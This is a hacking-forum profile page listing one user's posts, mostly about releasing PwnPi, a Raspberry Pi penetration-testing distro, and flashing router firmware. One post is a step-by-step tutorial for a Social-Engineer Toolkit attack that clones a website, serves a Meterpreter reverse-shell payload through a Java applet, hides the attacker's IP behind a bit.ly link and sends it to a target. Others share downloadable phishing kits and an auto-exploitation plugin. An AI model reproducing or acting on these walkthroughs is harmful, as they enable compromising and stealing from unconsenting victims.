Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

reflex's Achievements


Newbie (1/14)

  1. I would hope that any nuclear research facility wouldnt be running some kind of back up, If these weapons didnt exist the world would be a much safer place :)
  2. Hi everyone, PwnPi 3.0 The Pen Test Drop Box distro for the Raspberry Pi has been released! Now packing 200+ pentest tools and added easy setup of reverse connections. PwnPi Website : http://pwnpi.net/ SourceForge page : http://sourceforge.net/projects/pwnpi/ Screenshot 1 : http://s16.postimage...088ud/image.png Screenshot 2 : http://s10.postimage...xui2h/image.png Screenshot 3 : http://s16.postimage...p7bgl/image.png Direct Download : http://sourceforge.n...img.7z/download md5:5d0f146557def874b34ba0a5568d6c32:pwnpi-3.0.img.7z username:password:root:toor Let me know if you have any questions. Reflex!
  3. Hi guys not been on in a while, heres a quick tut i wrote. I ADVISE DOING THIS FROM A LIVE USB OF BACKTRACK AS YOU WILL BE EXPOSED TO THE INTERNET (CAN BE DANGEROUS) Startup SET ++++++++++++++++ Selct 1) Social-Engineering Attacks ++++++++++++++++ ++++++++++++++++ Selct 2) Website Attack Vectors ++++++++++++++++ ++++++++++++++++ Selct 1) Java Applet Attack Method ++++++++++++++++ ++++++++++++++++ Selct 2) Site Cloner ++++++++++++++++ [-] NAT/Port Forwarding can be used in the cases where your SET machine is [-] not externally exposed and may be a different IP address than your reverse listener. set> Are you using NAT/Port Forwarding [yes|no]: ++++++++++++++++ Select YES ++++++++++++++++ set:webattack> IP address to SET web server (this could be your external IP or hostname): ++++++++++++++++ Type in your external IP (open terminal and type "curl ifconfig.me" to find what it is) ++++++++++++++++ set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]: ++++++++++++++++ Select NO ++++++++++++++++ set:webattack> Enter the url to clone: ++++++++++++++++ Enter a website you want to clone (http://www.website.com) ++++++++++++++++ What payload do you want to generate: Name: Description: 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Bind Shell Execute payload and create an accepting port on remote system 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter 11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET 12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support 13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP 14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec 15) PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector 16) Import your own executable Specify a path for your own executable ++++++++++++++++ Select 14) ShellCodeExec Alphanum Shellcode ++++++++++++++++ set:payloads> PORT of the listener [443]: ++++++++++++++++ Press enter for default port 443 ++++++++++++++++ Select the payload you want to deliver via shellcodeexec 1) Windows Meterpreter Reverse TCP 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager 4) Windows Meterpreter (ALL PORTS) Reverse TCP ++++++++++++++++ Select 1) Windows Meterpreter Reverse TCP ++++++++++++++++ Wait a while,it will generate the payloads then start metasploit. While your waiting log into your router, probably 192.168.x.x and look for the DMZ option, should be under NAT or advanced. Enter your local IP into into the DMZ field, ("ifconfig" in terminal to get lan ip, sure you know that though) Go to https://bitly.com/ enter your external IP and you will get a link something like http://bit.ly/a00d7M. Give someone the link and and hope they have Java installed. Happy Hacking, Reflex.
  4. Just released PwnPi v2.0 Final. Ive installed 181 pen test tools. The project was on front page of hackaday yesterday and used up all the sourceforge webpage bandwith so have registered the official pwnpi site. http://pwnpi.net/ or http://pwnpi.sourceforge.net/ (redirects to http://pwnpi.net/) Screenshots http://sourceforge.net/projects/pwnpi/screenshots/1.png http://sourceforge.net/projects/pwnpi/screenshots/2.png http://sourceforge.net/projects/pwnpi/screenshots/3.png http://sourceforge.net/projects/pwnpi/screenshots/4.png http://sourceforge.net/projects/pwnpi/screenshots/5.png http://sourceforge.net/projects/pwnpi/screenshots/6.png Tools List http://pwnpi.net/tools.html Download http://pwnpi.net/download.html Reflex!
  5. PwnPi v2.0-Pre-Release is now up. Check out http://pwnpi.sourceforge.net/ for screens and tools list. Still got a lot of work to do untill PwnPi v2.0-Final but just thought id upload it anyway.
  6. Just give me a shout if you need help with anything. I installed xfce as its a more complete windows manager than lxde, cant stand it. Hey telot, if you want to help work on PwnPi v2.0 that would be great.
  7. Just finished making PwnPi v1.0, a Raspberry Pi security distro. Uploading to sourceforge now. Heres some links, sourceforge page : http://sourceforge.net/projects/pwnpi/ website (needs updating) : http://www.pwnpi.com/ PwnPi in action : http://postimage.org/image/82dd5gkw7/ Tools List : http://pastebin.com/Kp5jEGtn Its based on the debian squeeze image with xfce as the window manager.
  8. Hi there, did any get there Raspberry Pi then? I jst bought one of ebay and should get in a couple of days. I will be starting a Pi dropbox distro as soon as I receive my RPi in the post. Reply if anyone would want to work on this together. Reflex!
  9. Yeh same here, Atheros minipci 422K/s eta 23m 37s Alfa Awus036h 43.1K/s eta 1h 52m such a shame cause this card kicks ass. Is it the patched drivers? might try a diff distro see if that helps
  10. Solution in case anybody wants it : Download http://uploading.com/files/3be927b2/Alfa-AP51-DD-WRT.zip , connect to pineapple through LAN. Unzip Alfa-AP51-DD-WRT.zip and cd into Alfa-AP51-DD-WRT directory then run "./ap51-flash-1.0-42 eth0 root.fs vmlinux.bin.l7 nvram". If it says no packet then just unplug router then plugin again. Should get a message about your IP and MAC then will start to upload.
  11. Yeh im using Linux though, will install windows if no one comes up with a solution, need to re-jailbreak my iPhone anywayz
  12. Hi there, thanks for the quick reply but isnt working. root@Pineapple:/tmp# sysupgrade -n -v /tmp/AP51_ID_nb_r1600_ETSI.bin Invalid image. Use combined .img files on this platform Image check 'platform_check_image' failed. any ideas?
  13. Hi there, im in need of a router and wanting to to install DD-WRT or Open-WRT on the Alfa AP51. Currently it has the Pineapple MK3 firmware installed and finding it hard to fend any decent docu on this. Anyone done this willing to write up a quick tut, would be appreciated.
  14. Here, some phishers that i made. Gimme a shout if you want anymore! http://www.mediafire.com/file/zfl51ra0la5eo1a/phishers.rar Have fun. reflex
  15. Hey ppl, put this in your metasploit plugins folder http://www.mediafire.com/file/44nedlahq4pisfx/db_autopwn.rb When MSF starts type "load db_autowpn" then "db_autopwn" for the options. :)
  • Create New...